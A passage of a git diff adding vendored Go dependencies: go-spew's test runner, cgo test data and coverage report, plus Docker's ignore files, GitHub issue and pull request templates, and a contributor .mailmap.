+		{scsNoPtrAddr, fCSSdump, "", tptr, "(*spew_test.ptrTester)({\ns: (*struct {})({\n})\n})\n"},
+		{scsNoCap, fCSSdump, "", make([]string, 0, 10), "([]string) {\n}\n"},
+		{scsNoCap, fCSSdump, "", make([]string, 1, 10), "([]string) (len=1) {\n(string) \"\"\n}\n"},
+	}
+}
+
+// TestSpew executes all of the tests described by spewTests.
+func TestSpew(t *testing.T) {
+	initSpewTests()
+
+	t.Logf("Running %d tests", len(spewTests))
+	for i, test := range spewTests {
+		buf := new(bytes.Buffer)
+		switch test.f {
+		case fCSFdump:
+			test.cs.Fdump(buf, test.in)
+
+		case fCSFprint:
+			test.cs.Fprint(buf, test.in)
+
+		case fCSFprintf:
+			test.cs.Fprintf(buf, test.format, test.in)
+
+		case fCSFprintln:
+			test.cs.Fprintln(buf, test.in)
+
+		case fCSPrint:
+			b, err := redirStdout(func() { test.cs.Print(test.in) })
+			if err != nil {
+				t.Errorf("%v #%d %v", test.f, i, err)
+				continue
+			}
+			buf.Write(b)
+
+		case fCSPrintln:
+			b, err := redirStdout(func() { test.cs.Println(test.in) })
+			if err != nil {
+				t.Errorf("%v #%d %v", test.f, i, err)
+				continue
+			}
+			buf.Write(b)
+
+		case fCSSdump:
+			str := test.cs.Sdump(test.in)
+			buf.WriteString(str)
+
+		case fCSSprint:
+			str := test.cs.Sprint(test.in)
+			buf.WriteString(str)
+
+		case fCSSprintf:
+			str := test.cs.Sprintf(test.format, test.in)
+			buf.WriteString(str)
+
+		case fCSSprintln:
+			str := test.cs.Sprintln(test.in)
+			buf.WriteString(str)
+
+		case fCSErrorf:
+			err := test.cs.Errorf(test.format, test.in)
+			buf.WriteString(err.Error())
+
+		case fCSNewFormatter:
+			fmt.Fprintf(buf, test.format, test.cs.NewFormatter(test.in))
+
+		case fErrorf:
+			err := spew.Errorf(test.format, test.in)
+			buf.WriteString(err.Error())
+
+		case fFprint:
+			spew.Fprint(buf, test.in)
+
+		case fFprintln:
+			spew.Fprintln(buf, test.in)
+
+		case fPrint:
+			b, err := redirStdout(func() { spew.Print(test.in) })
+			if err != nil {
+				t.Errorf("%v #%d %v", test.f, i, err)
+				continue
+			}
+			buf.Write(b)
+
+		case fPrintln:
+			b, err := redirStdout(func() { spew.Println(test.in) })
+			if err != nil {
+				t.Errorf("%v #%d %v", test.f, i, err)
+				continue
+			}
+			buf.Write(b)
+
+		case fSdump:
+			str := spew.Sdump(test.in)
+			buf.WriteString(str)
+
+		case fSprint:
+			str := spew.Sprint(test.in)
+			buf.WriteString(str)
+
+		case fSprintf:
+			str := spew.Sprintf(test.format, test.in)
+			buf.WriteString(str)
+
+		case fSprintln:
+			str := spew.Sprintln(test.in)
+			buf.WriteString(str)
+
+		default:
+			t.Errorf("%v #%d unrecognized function", test.f, i)
+			continue
+		}
+		s := buf.String()
+		if test.want != s {
+			t.Errorf("ConfigState #%d\n got: %s want: %s", i, s, test.want)
+			continue
+		}
+	}
+}
diff --git a/vendor/github.com/davecgh/go-spew/spew/testdata/dumpcgo.go b/vendor/github.com/davecgh/go-spew/spew/testdata/dumpcgo.go
new file mode 100644
index 0000000000..5c87dd456e
--- /dev/null
+++ b/vendor/github.com/davecgh/go-spew/spew/testdata/dumpcgo.go
@@ -0,0 +1,82 @@
+// Copyright (c) 2013 Dave Collins <dave@davec.name>
+//
+// Permission to use, copy, modify, and distribute this software for any
+// purpose with or without fee is hereby granted, provided that the above
+// copyright notice and this permission notice appear in all copies.
+//
+// THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+// WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+// MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+// ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+// WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+// ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+// OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+
+// NOTE: Due to the following build constraints, this file will only be compiled
+// when both cgo is supported and "-tags testcgo" is added to the go test
+// command line.  This code should really only be in the dumpcgo_test.go file,
+// but unfortunately Go will not allow cgo in test files, so this is a
+// workaround to allow cgo types to be tested.  This configuration is used
+// because spew itself does not require cgo to run even though it does handle
+// certain cgo types specially.  Rather than forcing all clients to require cgo
+// and an external C compiler just to run the tests, this scheme makes them
+// optional.
+// +build cgo,testcgo
+
+package testdata
+
+/*
+#include <stdint.h>
+typedef unsigned char custom_uchar_t;
+
+char            *ncp = 0;
+char            *cp = "test";
+char             ca[6] = {'t', 'e', 's', 't', '2', '\0'};
+unsigned char    uca[6] = {'t', 'e', 's', 't', '3', '\0'};
+signed char      sca[6] = {'t', 'e', 's', 't', '4', '\0'};
+uint8_t          ui8ta[6] = {'t', 'e', 's', 't', '5', '\0'};
+custom_uchar_t   tuca[6] = {'t', 'e', 's', 't', '6', '\0'};
+*/
+import "C"
+
+// GetCgoNullCharPointer returns a null char pointer via cgo.  This is only
+// used for tests.
+func GetCgoNullCharPointer() interface{} {
+	return C.ncp
+}
+
+// GetCgoCharPointer returns a char pointer via cgo.  This is only used for
+// tests.
+func GetCgoCharPointer() interface{} {
+	return C.cp
+}
+
+// GetCgoCharArray returns a char array via cgo and the array's len and cap.
+// This is only used for tests.
+func GetCgoCharArray() (interface{}, int, int) {
+	return C.ca, len(C.ca), cap(C.ca)
+}
+
+// GetCgoUnsignedCharArray returns an unsigned char array via cgo and the
+// array's len and cap.  This is only used for tests.
+func GetCgoUnsignedCharArray() (interface{}, int, int) {
+	return C.uca, len(C.uca), cap(C.uca)
+}
+
+// GetCgoSignedCharArray returns a signed char array via cgo and the array's len
+// and cap.  This is only used for tests.
+func GetCgoSignedCharArray() (interface{}, int, int) {
+	return C.sca, len(C.sca), cap(C.sca)
+}
+
+// GetCgoUint8tArray returns a uint8_t array via cgo and the array's len and
+// cap.  This is only used for tests.
+func GetCgoUint8tArray() (interface{}, int, int) {
+	return C.ui8ta, len(C.ui8ta), cap(C.ui8ta)
+}
+
+// GetCgoTypdefedUnsignedCharArray returns a typedefed unsigned char array via
+// cgo and the array's len and cap.  This is only used for tests.
+func GetCgoTypdefedUnsignedCharArray() (interface{}, int, int) {
+	return C.tuca, len(C.tuca), cap(C.tuca)
+}
diff --git a/vendor/github.com/davecgh/go-spew/test_coverage.txt b/vendor/github.com/davecgh/go-spew/test_coverage.txt
new file mode 100644
index 0000000000..2cd087a2a1
--- /dev/null
+++ b/vendor/github.com/davecgh/go-spew/test_coverage.txt
@@ -0,0 +1,61 @@
+
+github.com/davecgh/go-spew/spew/dump.go		 dumpState.dump			 100.00% (88/88)
+github.com/davecgh/go-spew/spew/format.go	 formatState.format		 100.00% (82/82)
+github.com/davecgh/go-spew/spew/format.go	 formatState.formatPtr		 100.00% (52/52)
+github.com/davecgh/go-spew/spew/dump.go		 dumpState.dumpPtr		 100.00% (44/44)
+github.com/davecgh/go-spew/spew/dump.go		 dumpState.dumpSlice		 100.00% (39/39)
+github.com/davecgh/go-spew/spew/common.go	 handleMethods			 100.00% (30/30)
+github.com/davecgh/go-spew/spew/common.go	 printHexPtr			 100.00% (18/18)
+github.com/davecgh/go-spew/spew/common.go	 unsafeReflectValue		 100.00% (13/13)
+github.com/davecgh/go-spew/spew/format.go	 formatState.constructOrigFormat 100.00% (12/12)
+github.com/davecgh/go-spew/spew/dump.go		 fdump				 100.00% (11/11)
+github.com/davecgh/go-spew/spew/format.go	 formatState.Format		 100.00% (11/11)
+github.com/davecgh/go-spew/spew/common.go	 init				 100.00% (10/10)
+github.com/davecgh/go-spew/spew/common.go	 printComplex			 100.00% (9/9)
+github.com/davecgh/go-spew/spew/common.go	 valuesSorter.Less		 100.00% (8/8)
+github.com/davecgh/go-spew/spew/format.go	 formatState.buildDefaultFormat	 100.00% (7/7)
+github.com/davecgh/go-spew/spew/format.go	 formatState.unpackValue	 100.00% (5/5)
+github.com/davecgh/go-spew/spew/dump.go		 dumpState.indent		 100.00% (4/4)
+github.com/davecgh/go-spew/spew/common.go	 catchPanic			 100.00% (4/4)
+github.com/davecgh/go-spew/spew/config.go	 ConfigState.convertArgs	 100.00% (4/4)
+github.com/davecgh/go-spew/spew/spew.go		 convertArgs			 100.00% (4/4)
+github.com/davecgh/go-spew/spew/format.go	 newFormatter			 100.00% (3/3)
+github.com/davecgh/go-spew/spew/dump.go		 Sdump				 100.00% (3/3)
+github.com/davecgh/go-spew/spew/common.go	 printBool			 100.00% (3/3)
+github.com/davecgh/go-spew/spew/common.go	 sortValues			 100.00% (3/3)
+github.com/davecgh/go-spew/spew/config.go	 ConfigState.Sdump		 100.00% (3/3)
+github.com/davecgh/go-spew/spew/dump.go		 dumpState.unpackValue		 100.00% (3/3)
+github.com/davecgh/go-spew/spew/spew.go		 Printf				 100.00% (1/1)
+github.com/davecgh/go-spew/spew/spew.go		 Println			 100.00% (1/1)
+github.com/davecgh/go-spew/spew/spew.go		 Sprint				 100.00% (1/1)
+github.com/davecgh/go-spew/spew/spew.go		 Sprintf			 100.00% (1/1)
+github.com/davecgh/go-spew/spew/spew.go		 Sprintln			 100.00% (1/1)
+github.com/davecgh/go-spew/spew/common.go	 printFloat			 100.00% (1/1)
+github.com/davecgh/go-spew/spew/config.go	 NewDefaultConfig		 100.00% (1/1)
+github.com/davecgh/go-spew/spew/common.go	 printInt			 100.00% (1/1)
+github.com/davecgh/go-spew/spew/common.go	 printUint			 100.00% (1/1)
+github.com/davecgh/go-spew/spew/common.go	 valuesSorter.Len		 100.00% (1/1)
+github.com/davecgh/go-spew/spew/common.go	 valuesSorter.Swap		 100.00% (1/1)
+github.com/davecgh/go-spew/spew/config.go	 ConfigState.Errorf		 100.00% (1/1)
+github.com/davecgh/go-spew/spew/config.go	 ConfigState.Fprint		 100.00% (1/1)
+github.com/davecgh/go-spew/spew/config.go	 ConfigState.Fprintf		 100.00% (1/1)
+github.com/davecgh/go-spew/spew/config.go	 ConfigState.Fprintln		 100.00% (1/1)
+github.com/davecgh/go-spew/spew/config.go	 ConfigState.Print		 100.00% (1/1)
+github.com/davecgh/go-spew/spew/config.go	 ConfigState.Printf		 100.00% (1/1)
+github.com/davecgh/go-spew/spew/config.go	 ConfigState.Println		 100.00% (1/1)
+github.com/davecgh/go-spew/spew/config.go	 ConfigState.Sprint		 100.00% (1/1)
+github.com/davecgh/go-spew/spew/config.go	 ConfigState.Sprintf		 100.00% (1/1)
+github.com/davecgh/go-spew/spew/config.go	 ConfigState.Sprintln		 100.00% (1/1)
+github.com/davecgh/go-spew/spew/config.go	 ConfigState.NewFormatter	 100.00% (1/1)
+github.com/davecgh/go-spew/spew/config.go	 ConfigState.Fdump		 100.00% (1/1)
+github.com/davecgh/go-spew/spew/config.go	 ConfigState.Dump		 100.00% (1/1)
+github.com/davecgh/go-spew/spew/dump.go		 Fdump				 100.00% (1/1)
+github.com/davecgh/go-spew/spew/dump.go		 Dump				 100.00% (1/1)
+github.com/davecgh/go-spew/spew/spew.go		 Fprintln			 100.00% (1/1)
+github.com/davecgh/go-spew/spew/format.go	 NewFormatter			 100.00% (1/1)
+github.com/davecgh/go-spew/spew/spew.go		 Errorf				 100.00% (1/1)
+github.com/davecgh/go-spew/spew/spew.go		 Fprint				 100.00% (1/1)
+github.com/davecgh/go-spew/spew/spew.go		 Fprintf			 100.00% (1/1)
+github.com/davecgh/go-spew/spew/spew.go		 Print				 100.00% (1/1)
+github.com/davecgh/go-spew/spew			 ------------------------------- 100.00% (505/505)
+
diff --git a/vendor/github.com/docker/docker/.dockerignore b/vendor/github.com/docker/docker/.dockerignore
new file mode 100644
index 0000000000..082cac9224
--- /dev/null
+++ b/vendor/github.com/docker/docker/.dockerignore
@@ -0,0 +1,4 @@
+bundles
+.gopath
+vendor/pkg
+.go-pkg-cache
diff --git a/vendor/github.com/docker/docker/.github/ISSUE_TEMPLATE.md b/vendor/github.com/docker/docker/.github/ISSUE_TEMPLATE.md
new file mode 100644
index 0000000000..7362480a4a
--- /dev/null
+++ b/vendor/github.com/docker/docker/.github/ISSUE_TEMPLATE.md
@@ -0,0 +1,64 @@
+<!--
+If you are reporting a new issue, make sure that we do not have any duplicates
+already open. You can ensure this by searching the issue list for this
+repository. If there is a duplicate, please close your issue and add a comment
+to the existing issue instead.
+
+If you suspect your issue is a bug, please edit your issue description to
+include the BUG REPORT INFORMATION shown below. If you fail to provide this
+information within 7 days, we cannot debug your issue and will close it. We
+will, however, reopen it if you later provide the information.
+
+For more information about reporting issues, see
+https://github.com/docker/docker/blob/master/CONTRIBUTING.md#reporting-other-issues
+
+---------------------------------------------------
+GENERAL SUPPORT INFORMATION
+---------------------------------------------------
+
+The GitHub issue tracker is for bug reports and feature requests.
+General support can be found at the following locations:
+
+- Docker Support Forums - https://forums.docker.com
+- IRC - irc.freenode.net #docker channel
+- Post a question on StackOverflow, using the Docker tag
+
+---------------------------------------------------
+BUG REPORT INFORMATION
+---------------------------------------------------
+Use the commands below to provide key information from your environment:
+You do NOT have to include this information if this is a FEATURE REQUEST
+-->
+
+**Description**
+
+<!--
+Briefly describe the problem you are having in a few paragraphs.
+-->
+
+**Steps to reproduce the issue:**
+1.
+2.
+3.
+
+**Describe the results you received:**
+
+
+**Describe the results you expected:**
+
+
+**Additional information you deem important (e.g. issue happens only occasionally):**
+
+**Output of `docker version`:**
+
+```
+(paste your output here)
+```
+
+**Output of `docker info`:**
+
+```
+(paste your output here)
+```
+
+**Additional environment details (AWS, VirtualBox, physical, etc.):**
diff --git a/vendor/github.com/docker/docker/.github/PULL_REQUEST_TEMPLATE.md b/vendor/github.com/docker/docker/.github/PULL_REQUEST_TEMPLATE.md
new file mode 100644
index 0000000000..426981828b
--- /dev/null
+++ b/vendor/github.com/docker/docker/.github/PULL_REQUEST_TEMPLATE.md
@@ -0,0 +1,30 @@
+<!--
+Please make sure you've read and understood our contributing guidelines;
+https://github.com/docker/docker/blob/master/CONTRIBUTING.md
+
+** Make sure all your commits include a signature generated with `git commit -s` **
+
+For additional information on our contributing process, read our contributing
+guide https://docs.docker.com/opensource/code/
+
+If this is a bug fix, make sure your description includes "fixes #xxxx", or
+"closes #xxxx"
+
+Please provide the following information:
+-->
+
+**- What I did**
+
+**- How I did it**
+
+**- How to verify it**
+
+**- Description for the changelog**
+<!--
+Write a short (one line) summary that describes the changes in this
+pull request for inclusion in the changelog:
+-->
+
+
+**- A picture of a cute animal (not mandatory but encouraged)**
+
diff --git a/vendor/github.com/docker/docker/.gitignore b/vendor/github.com/docker/docker/.gitignore
new file mode 100644
index 0000000000..be8b03d17b
--- /dev/null
+++ b/vendor/github.com/docker/docker/.gitignore
@@ -0,0 +1,33 @@
+# Docker project generated files to ignore
+#  if you want to ignore files created by your editor/tools,
+#  please consider a global .gitignore https://help.github.com/articles/ignoring-files
+*.exe
+*.exe~
+*.orig
+*.test
+.*.swp
+.DS_Store
+# a .bashrc may be added to customize the build environment
+.bashrc
+.editorconfig
+.gopath/
+.go-pkg-cache/
+autogen/
+bundles/
+cmd/dockerd/dockerd
+cmd/docker/docker
+dockerversion/version_autogen.go
+dockerversion/version_autogen_unix.go
+docs/AWS_S3_BUCKET
+docs/GITCOMMIT
+docs/GIT_BRANCH
+docs/VERSION
+docs/_build
+docs/_static
+docs/_templates
+docs/changed-files
+# generated by man/md2man-all.sh
+man/man1
+man/man5
+man/man8
+vendor/pkg/
diff --git a/vendor/github.com/docker/docker/.mailmap b/vendor/github.com/docker/docker/.mailmap
new file mode 100644
index 0000000000..fe99e2086f
--- /dev/null
+++ b/vendor/github.com/docker/docker/.mailmap
@@ -0,0 +1,275 @@
+# Generate AUTHORS: hack/generate-authors.sh
+
+# Tip for finding duplicates (besides scanning the output of AUTHORS for name
+# duplicates that aren't also email duplicates): scan the output of:
+#   git log --format='%aE - %aN' | sort -uf
+#
+# For explanation on this file format: man git-shortlog
+
+Patrick Stapleton <github@gdi2290.com>
+Shishir Mahajan <shishir.mahajan@redhat.com> <smahajan@redhat.com>
+Erwin van der Koogh <info@erronis.nl>
+Ahmed Kamal <email.ahmedkamal@googlemail.com>
+Tejesh Mehta <tejesh.mehta@gmail.com> <tj@init.me>
+Cristian Staretu <cristian.staretu@gmail.com>
+Cristian Staretu <cristian.staretu@gmail.com> <unclejacksons@gmail.com>
+Cristian Staretu <cristian.staretu@gmail.com> <unclejack@users.noreply.github.com>
+Marcus Linke <marcus.linke@gmx.de>
+Aleksandrs Fadins <aleks@s-ko.net>
+Christopher Latham <sudosurootdev@gmail.com>
+Hu Keping <hukeping@huawei.com>
+Wayne Chang <wayne@neverfear.org>
+Chen Chao <cc272309126@gmail.com>
+Daehyeok Mun <daehyeok@gmail.com>
+<daehyeok@gmail.com> <daehyeok@daehyeokui-MacBook-Air.local>
+<jt@yadutaf.fr> <admin@jtlebi.fr>
+<jeff@docker.com> <jefferya@programmerq.net>
+<charles.hooper@dotcloud.com> <chooper@plumata.com>
+<daniel.mizyrycki@dotcloud.com> <daniel@dotcloud.com>
+<daniel.mizyrycki@dotcloud.com> <mzdaniel@glidelink.net>
+Guillaume J. Charmes <guillaume.charmes@docker.com> <charmes.guillaume@gmail.com>
+<guillaume.charmes@docker.com> <guillaume@dotcloud.com>
+<guillaume.charmes@docker.com> <guillaume@docker.com>
+<guillaume.charmes@docker.com> <guillaume.charmes@dotcloud.com>
+<guillaume.charmes@docker.com> <guillaume@charmes.net>
+<kencochrane@gmail.com> <KenCochrane@gmail.com>
+Thatcher Peskens <thatcher@docker.com>
+Thatcher Peskens <thatcher@docker.com> <thatcher@dotcloud.com>
+Thatcher Peskens <thatcher@docker.com> dhrp <thatcher@gmx.net>
+Jérôme Petazzoni <jerome.petazzoni@dotcloud.com> jpetazzo <jerome.petazzoni@dotcloud.com>
+Jérôme Petazzoni <jerome.petazzoni@dotcloud.com> <jp@enix.org>
+Joffrey F <joffrey@docker.com>
+Joffrey F <joffrey@docker.com> <joffrey@dotcloud.com>
+Joffrey F <joffrey@docker.com> <f.joffrey@gmail.com>
+Tim Terhorst <mynamewastaken+git@gmail.com>
+Andy Smith <github@anarkystic.com>
+<kalessin@kalessin.fr> <louis@dotcloud.com>
+<victor.vieux@docker.com> <victor.vieux@dotcloud.com>
+<victor.vieux@docker.com> <victor@dotcloud.com>
+<victor.vieux@docker.com> <dev@vvieux.com>
+<victor.vieux@docker.com> <victor@docker.com>
+<victor.vieux@docker.com> <vieux@docker.com>
+<victor.vieux@docker.com> <victorvieux@gmail.com>
+<dominik@honnef.co> <dominikh@fork-bomb.org>
+<ehanchrow@ine.com> <eric.hanchrow@gmail.com>
+Walter Stanish <walter@pratyeka.org>
+<daniel@gasienica.ch> <dgasienica@zynga.com>
+Roberto Hashioka <roberto_hashioka@hotmail.com>
+Konstantin Pelykh <kpelykh@zettaset.com>
+David Sissitka <me@dsissitka.com>
+Nolan Darilek <nolan@thewordnerd.info>
+<mastahyeti@gmail.com> <mastahyeti@users.noreply.github.com>
+Benoit Chesneau <bchesneau@gmail.com>
+Jordan Arentsen <blissdev@gmail.com>
+Daniel Garcia <daniel@danielgarcia.info>
+Miguel Angel Fernández <elmendalerenda@gmail.com>
+Bhiraj Butala <abhiraj.butala@gmail.com>
+Faiz Khan <faizkhan00@gmail.com>
+Victor Lyuboslavsky <victor@victoreda.com>
+Jean-Baptiste Barth <jeanbaptiste.barth@gmail.com>
+Matthew Mueller <mattmuelle@gmail.com>
+<mosoni@ebay.com> <mohitsoni1989@gmail.com>
+Shih-Yuan Lee <fourdollars@gmail.com>
+Daniel Mizyrycki <daniel.mizyrycki@dotcloud.com> root <root@vagrant-ubuntu-12.10.vagrantup.com>
+Jean-Baptiste Dalido <jeanbaptiste@appgratis.com>
+<proppy@google.com> <proppy@aminche.com>
+<michael@docker.com> <michael@crosbymichael.com>
+<michael@docker.com> <crosby.michael@gmail.com>
+<michael@docker.com> <crosbymichael@gmail.com>
+<github@developersupport.net> <github@metaliveblog.com>
+<brandon@ifup.org> <brandon@ifup.co>
+<dano@spotify.com> <daniel.norberg@gmail.com>
+<danny@codeaholics.org> <Danny.Yates@mailonline.co.uk>
+<gurjeet@singh.im> <singh.gurjeet@gmail.com>
+<shawn@churchofgit.com> <shawnlandden@gmail.com>
+<sjoerd-github@linuxonly.nl> <sjoerd@byte.nl>
+<solomon@docker.com> <solomon.hykes@dotcloud.com>
+<solomon@docker.com> <solomon@dotcloud.com>
+<solomon@docker.com> <s@docker.com>
+Sven Dowideit <SvenDowideit@home.org.au>
+Sven Dowideit <SvenDowideit@home.org.au> <SvenDowideit@fosiki.com>
+Sven Dowideit <SvenDowideit@home.org.au> <SvenDowideit@docker.com>
+Sven Dowideit <SvenDowideit@home.org.au> <¨SvenDowideit@home.org.au¨>
+Sven Dowideit <SvenDowideit@home.org.au> <SvenDowideit@home.org.au>
+Sven Dowideit <SvenDowideit@home.org.au> <SvenDowideit@users.noreply.github.com>
+Sven Dowideit <SvenDowideit@home.org.au> <sven@t440s.home.gateway>
+<alexl@redhat.com> <alexander.larsson@gmail.com>
+Alexander Morozov <lk4d4@docker.com> <lk4d4math@gmail.com>
+Alexander Morozov <lk4d4@docker.com>
+<git.nivoc@neverbox.com> <kuehnle@online.de>
+O.S. Tezer <ostezer@gmail.com>
+<ostezer@gmail.com> <ostezer@users.noreply.github.com>
+Roberto G. Hashioka <roberto.hashioka@docker.com> <roberto_hashioka@hotmail.com>
+<justin.p.simonelis@gmail.com> <justin.simonelis@PTS-JSIMON2.toronto.exclamation.com>
+<taim@bosboot.org> <maztaim@users.noreply.github.com>
+<viktor.vojnovski@amadeus.com> <vojnovski@gmail.com>
+<vbatts@redhat.com> <vbatts@hashbangbash.com>
+<altsysrq@gmail.com> <iamironbob@gmail.com>
+Sridhar Ratnakumar <sridharr@activestate.com>
+Sridhar Ratnakumar <sridharr@activestate.com> <github@srid.name>
+Liang-Chi Hsieh <viirya@gmail.com>
+Aleksa Sarai <asarai@suse.de>
+Aleksa Sarai <asarai@suse.de> <asarai@suse.com>
+Aleksa Sarai <asarai@suse.de> <cyphar@cyphar.com>
+Will Weaver <monkey@buildingbananas.com>
+Timothy Hobbs <timothyhobbs@seznam.cz>
+Nathan LeClaire <nathan.leclaire@docker.com> <nathan.leclaire@gmail.com>
+Nathan LeClaire <nathan.leclaire@docker.com> <nathanleclaire@gmail.com>
+<github@hollensbe.org> <erik+github@hollensbe.org>
+<github@albersweb.de> <albers@users.noreply.github.com>
+<lsm5@fedoraproject.org> <lsm5@redhat.com>
+<marc@marc-abramowitz.com> <msabramo@gmail.com>
+Matthew Heon <mheon@redhat.com> <mheon@mheonlaptop.redhat.com>
+<bernat@luffy.cx> <vincent@bernat.im>
+<bernat@luffy.cx> <Vincent.Bernat@exoscale.ch>
+<p@pwaller.net> <peter@scraperwiki.com>
+<andrew.weiss@outlook.com> <andrew.weiss@microsoft.com>
+Francisco Carriedo <fcarriedo@gmail.com>
+<julienbordellier@gmail.com> <git@julienbordellier.com>
+<ahmetb@microsoft.com> <ahmetalpbalkan@gmail.com>
+<arnaud.porterie@docker.com> <icecrime@gmail.com>
+<baloo@gandi.net> <superbaloo+registrations.github@superbaloo.net>
+Brian Goff <cpuguy83@gmail.com>
+<cpuguy83@gmail.com> <bgoff@cpuguy83-mbp.home>
+<eric@windisch.us> <ewindisch@docker.com>
+<frank.rosquin+github@gmail.com> <frank.rosquin@gmail.com>
+Hollie Teal <hollie@docker.com>
+<hollie@docker.com> <hollie.teal@docker.com>
+<hollie@docker.com> <hollietealok@users.noreply.github.com>
+<huu@prismskylabs.com> <whoshuu@gmail.com>
+Jessica Frazelle <jessfraz@google.com>
+Jessica Frazelle <jessfraz@google.com> <me@jessfraz.com>
+Jessica Frazelle <jessfraz@google.com> <jess@mesosphere.com>
+Jessica Frazelle <jessfraz@google.com> <jfrazelle@users.noreply.github.com>
+Jessica Frazelle <jessfraz@google.com> <acidburn@docker.com>
+Jessica Frazelle <jessfraz@google.com> <jess@docker.com>
+Jessica Frazelle <jessfraz@google.com> <princess@docker.com>
+<konrad.wilhelm.kleine@gmail.com> <kwk@users.noreply.github.com>
+<tintypemolly@gmail.com> <tintypemolly@Ohui-MacBook-Pro.local>
+<estesp@linux.vnet.ibm.com> <estesp@gmail.com>
+<github@gone.nl> <thaJeztah@users.noreply.github.com>
+Thomas LEVEIL <thomasleveil@gmail.com> Thomas LÉVEIL <thomasleveil@users.noreply.github.com>
+<oi@truffles.me.uk> <timruffles@googlemail.com>
+<Vincent.Bernat@exoscale.ch> <bernat@luffy.cx>
+Antonio Murdaca <antonio.murdaca@gmail.com> <amurdaca@redhat.com>
+Antonio Murdaca <antonio.murdaca@gmail.com> <runcom@redhat.com>
+Antonio Murdaca <antonio.murdaca@gmail.com> <me@runcom.ninja>
+Antonio Murdaca <antonio.murdaca@gmail.com> <runcom@linux.com>
+Antonio Murdaca <antonio.murdaca@gmail.com> <runcom@users.noreply.github.com>
+Darren Shepherd <darren.s.shepherd@gmail.com> <darren@rancher.com>
+Deshi Xiao <dxiao@redhat.com> <dsxiao@dataman-inc.com>
+Deshi Xiao <dxiao@redhat.com> <xiaods@gmail.com>
+Doug Davis <dug@us.ibm.com> <duglin@users.noreply.github.com>
+Jacob Atzen <jacob@jacobatzen.dk> <jatzen@gmail.com>
+Jeff Nickoloff <jeff.nickoloff@gmail.com> <jeff@allingeek.com>
+John Howard (VM) <John.Howard@microsoft.com> <jhowardmsft@users.noreply.github.com>
+John Howard (VM) <John.Howard@microsoft.com>
+John Howard (VM) <John.Howard@microsoft.com> <john.howard@microsoft.com>
+John Howard (VM) <John.Howard@microsoft.com> <jhoward@microsoft.com>
+Madhu Venugopal <madhu@socketplane.io> <madhu@docker.com>
+Mary Anthony <mary.anthony@docker.com> <mary@docker.com>
+Mary Anthony <mary.anthony@docker.com> moxiegirl <mary@docker.com>
+Mary Anthony <mary.anthony@docker.com> <moxieandmore@gmail.com>
+mattyw <mattyw@me.com> <gh@mattyw.net>
+resouer <resouer@163.com> <resouer@gmail.com>
+AJ Bowen <aj@gandi.net> soulshake <amy@gandi.net> 
+AJ Bowen <aj@gandi.net> soulshake <aj@gandi.net>
+Tibor Vass <teabee89@gmail.com> <tibor@docker.com>
+Tibor Vass <teabee89@gmail.com> <tiborvass@users.noreply.github.com>
+Vincent Bernat <bernat@luffy.cx> <Vincent.Bernat@exoscale.ch>
+Yestin Sun <sunyi0804@gmail.com> <yestin.sun@polyera.com>
+bin liu <liubin0329@users.noreply.github.com> <liubin0329@gmail.com>
+John Howard (VM) <John.Howard@microsoft.com> jhowardmsft <jhoward@microsoft.com>
+Ankush Agarwal <ankushagarwal11@gmail.com> <ankushagarwal@users.noreply.github.com>
+Tangi COLIN <tangicolin@gmail.com> tangicolin <tangicolin@gmail.com>
+Allen Sun <allen.sun@daocloud.io>
+Adrien Gallouët <adrien@gallouet.fr> <angt@users.noreply.github.com>
+<aanm90@gmail.com> <martins@noironetworks.com>
+Anuj Bahuguna <anujbahuguna.dev@gmail.com>
+Anusha Ragunathan <anusha.ragunathan@docker.com> <anusha@docker.com>
+Avi Miller <avi.miller@oracle.com> <avi.miller@gmail.com>
+Brent Salisbury <brent.salisbury@docker.com> <brent@docker.com>
+Chander G <chandergovind@gmail.com>
+Chun Chen <ramichen@tencent.com> <chenchun.feed@gmail.com>
+Ying Li <cyli@twistedmatrix.com>
+Daehyeok Mun <daehyeok@gmail.com> <daehyeok@daehyeok-ui-MacBook-Air.local>
+<dqminh@cloudflare.com> <dqminh89@gmail.com>
+Daniel, Dao Quang Minh <dqminh@cloudflare.com>
+Daniel Nephin <dnephin@docker.com> <dnephin@gmail.com>
+Dave Tucker <dt@docker.com> <dave@dtucker.co.uk>
+Doug Tangren <d.tangren@gmail.com>
+Frederick F. Kautz IV <fkautz@redhat.com> <fkautz@alumni.cmu.edu>
+Ben Golub <ben.golub@dotcloud.com>
+Harold Cooper <hrldcpr@gmail.com>
+hsinko <21551195@zju.edu.cn> <hsinko@users.noreply.github.com>
+Josh Hawn <josh.hawn@docker.com> <jlhawn@berkeley.edu>
+Justin Cormack <justin.cormack@docker.com>
+<justin.cormack@docker.com> <justin.cormack@unikernel.com>
+<justin.cormack@docker.com> <justin@specialbusservice.com>
+Kamil Domański <kamil@domanski.co>
+Lei Jitang <leijitang@huawei.com>
+<leijitang@huawei.com> <leijitang@gmail.com>
+Linus Heckemann <lheckemann@twig-world.com>
+<lheckemann@twig-world.com> <anonymouse2048@gmail.com>
+Lynda O'Leary <lyndaoleary29@gmail.com>
+<lyndaoleary29@gmail.com> <lyndaoleary@hotmail.com>
+Marianna Tessel <mtesselh@gmail.com>
+Michael Huettermann <michael@huettermann.net>
+Moysés Borges <moysesb@gmail.com>
+<moysesb@gmail.com> <moyses.furtado@wplex.com.br>
+Nigel Poulton <nigelpoulton@hotmail.com>
+Qiang Huang <h.huangqiang@huawei.com>
+<h.huangqiang@huawei.com> <qhuang@10.0.2.15>
+Boaz Shuster <ripcurld.github@gmail.com>
+Shuwei Hao <haosw@cn.ibm.com>
+<haosw@cn.ibm.com> <haoshuwei24@gmail.com>
+Soshi Katsuta <soshi.katsuta@gmail.com>
+<soshi.katsuta@gmail.com> <katsuta_soshi@cyberagent.co.jp>
+Stefan Berger <stefanb@linux.vnet.ibm.com>
+<stefanb@linux.vnet.ibm.com> <stefanb@us.ibm.com>
+Stephen Day <stephen.day@docker.com>
+<stephen.day@docker.com> <stevvooe@users.noreply.github.com>
+Toli Kuznets <toli@docker.com>
